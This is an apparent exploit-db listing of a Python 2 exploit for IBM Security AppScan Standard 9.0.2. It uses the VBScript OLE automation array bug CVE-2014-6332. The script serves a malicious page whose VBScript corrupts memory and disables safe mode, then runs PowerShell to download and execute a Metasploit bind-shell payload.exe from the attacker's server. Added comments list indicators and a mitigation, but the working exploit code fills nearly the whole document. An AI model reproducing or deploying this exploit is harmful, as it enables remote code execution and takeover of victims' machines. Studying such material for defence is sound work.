IBM Security AppScan Standard 9.0.2 – OLE Automation Array Remote Code Execution

  • 作者: Naser Farhadi
    日期: 2015-06-01
  • 来源:https://www.exploit-db.com/exploits/37163/
  • #!/usr/bin/python
    
    import BaseHTTPServer, socket
    
    ##
    # IBM Security AppScan Standard OLE Automation Array Remote Code Execution
    #
    # Author: Naser Farhadi
    # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
    #
    # Date: 1 June 2015 # Version: <= 9.0.2 # Tested on: Windows 7
    #
    # Exploit Based on MS14-064 CVE-2014-6332 http://www.exploit-db.com/exploits/35229/ 
    # If you are able to exploit IE, then you can exploit AppScan and Acunetix ;)
    # This Python script starts a sample HTTP server on the attacker machine and serves the exploit code and
    # a Metasploit windows/shell_bind_tcp executable payload
    #
    # Usage:
    # chmod +x appscan.py
    # ./appscan.py
    # ...
    # nc 172.20.10.14 333
    #
    # Video: http://youtu.be/hPs1zQaBLMU
    ##
    
    class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
        """Serve the exploit page and the payload executable over HTTP.

        Python 2 handler (``BaseHTTPServer`` became ``http.server`` in
        Python 3; the module-level ``print`` statement in this file is also
        Python 2 only). Two routes are handled:

        * ``/payload.exe`` -- streams the file ``payload.exe`` read from the
          server process's current working directory.
        * anything else  -- returns an HTML page whose inline VBScript is the
          MS14-064 / CVE-2014-6332 OLE automation array technique referenced
          in the file header; on success it calls
          ``Shell.Application.ShellExecute "powershell" ...`` to download
          ``/payload.exe`` from this server and run it.

        Defender notes (all taken from the served script below):

        - The VBScript exits early when the user agent contains ``Win64`` or
          does not contain ``MSIE``, so only 32-bit MSIE-identifying clients
          are targeted; the ``intVersion < 4`` branch calls ``runshellcode``,
          which is never defined in the script (``On Error Resume Next``
          turns that into a silent no-op).
        - Network indicators: a GET for ``/payload.exe`` shortly after a GET
          of an HTML page containing ``Shell.Application`` / ``ShellExecute``;
          the PowerShell command line carries ``Invoke-Expression`` with
          ``System.Net.WebClient.DownloadFile``.
        - Host indicator: the scanning application's process spawning
          ``powershell -Command ...`` via ShellExecute with the ``runas`` verb
          and a show-window argument of 0 (no visible window).
        - Mitigation: the MS14-064 update for the VBScript engine; the
          version checks above and the Windows 7 test note in the header
          suggest this was only exercised on unpatched 32-bit IE engines.
        """

        def do_GET(req):
            # ``req`` is the conventional ``self`` (the handler instance).
            # Every path answers 200, including the payload route; there is no
            # 404 branch at all.
            req.send_response(200)
            if req.path == "/payload.exe":
                # Non-standard MIME type; ``application/octet-stream`` is the
                # usual choice for an arbitrary binary.
                req.send_header('Content-type', 'application/exe')
                req.end_headers()
                # Relative path: read from the CWD of the server process. No
                # guard here, so a missing file raises inside the handler.
                exe = open("payload.exe", 'rb')
                req.wfile.write(exe.read())
                exe.close()
            else:
                req.send_header('Content-type', 'text/html')
                req.end_headers()
                # The download URL embedded in the VBScript is built from this
                # host's resolved address, so the victim fetches ``payload.exe``
                # from this same server (see ``/payload.exe`` above).
                req.wfile.write("""Please scan me!
    <SCRIPT LANGUAGE="VBScript">
    function runmumaa() 
    On Error Resume Next
    set shell=createobject("Shell.Application")
    command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/payload.exe',\
    'payload.exe');$(New-Object -com Shell.Application).ShellExecute('payload.exe');"
    shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
    end function
    
    dim aa()
    dim ab()
    dim a0
    dim a1
    dim a2
    dim a3
    dim win9x
    dim intVersion
    dim rnda
    dim funclass
    dim myarray
    
    Begin()
    
    function Begin()
    On Error Resume Next
    info=Navigator.UserAgent
    
    if(instr(info,"Win64")>0) then
     exit function
    end if
    
    if (instr(info,"MSIE")>0) then 
     intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) 
    else
     exit function
     
    end if
    
    win9x=0
    
    BeginInit()
    If Create()=True Then
     myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
    
     if(intVersion<4) then
     document.write("<br> IE")
     document.write(intVersion)
     runshellcode()
     else
    setnotsafemode()
     end if
    end if
    end function
    
    function BeginInit()
     Randomize()
     redim aa(5)
     redim ab(5)
     a0=13+17*rnd(6)
     a3=7+3*rnd(5)
    end function
    
    function Create()
    On Error Resume Next
    dim i
    Create=False
    For i = 0 To 400
    If Over()=True Then
    ' document.write(i) 
     Create=True
     Exit For
    End If 
    Next
    end function
    
    sub testaa()
    end sub
    
    function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redimPreserve aa(a2)
    
     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314
    
     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310
     mydata=aa(a1)
     redimPreserve aa(a0)
    end function 
    
    
    function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4
    j=readmemo(i+&h120+k)
    if(j=14) then
    j=0
    redimPreserve aa(a2) 
     aa(a1+2)(i+&h11c+k)=ab(4)
    redimPreserve aa(a0)
    
     j=0 
    j=readmemo(i+&h120+k) 
     
     Exit for
     end if
    
    next 
    ab(2)=1.69759663316747E-313
    runmumaa() 
    end function
    
    function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000
    
    redimPreserve aa(a0) 
    redim ab(a0) 
    
    redimPreserve aa(a2)
    
    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10
    
    If(IsObject(aa(a1-1)) = False) Then
     if(intVersion<4) then
     mem=cint(a0+1)*16 
     j=vartype(aa(a1-1))
     if((j=mem+4) or (j*8=mem+8)) then
    if(vartype(aa(a1-1))<>0)Then
     If(IsObject(aa(a1)) = False ) Then 
     type1=VarType(aa(a1))
     end if 
    end if
     else
     redimPreserve aa(a0)
     exitfunction
    
     end if 
    else
     if(vartype(aa(a1-1))<>0)Then
    If(IsObject(aa(a1)) = False ) Then
    type1=VarType(aa(a1))
    end if 
    end if
    end if
    end if
    
    
    If(type1=&h2f66) Then 
    Over=True
    End If
    If(type1=&hB9AD) Then
    Over=True
    win9x=1
    End If
    
    redimPreserve aa(a0)
    
    end function
    
    function ReadMemo(add) 
    On Error Resume Next
    redimPreserve aa(a2)
    
    ab(0)=0 
    aa(a1)=add+4 
    ab(0)=1.69759663316747E-313 
    ReadMemo=lenb(aa(a1))
     
    ab(0)=0
     
    redimPreserve aa(a0)
    end function
    
    </script>""")
    
    if __name__ == '__main__':
        # Bind to this host's resolved address on TCP/80. Port 80 is a
        # privileged port on most systems, so this presumably runs with
        # elevated rights -- not shown here. Python 2 script (print statement).
        bind_addr = (socket.gethostbyname(socket.gethostname()), 80)
        server = BaseHTTPServer.HTTPServer(bind_addr, RequestHandler)
        print "Http server started", socket.gethostbyname(socket.gethostname()), 80
        try:
            server.serve_forever()
        except KeyboardInterrupt:
            pass  # Ctrl-C is the intended stop signal; fall through to close
        server.server_close()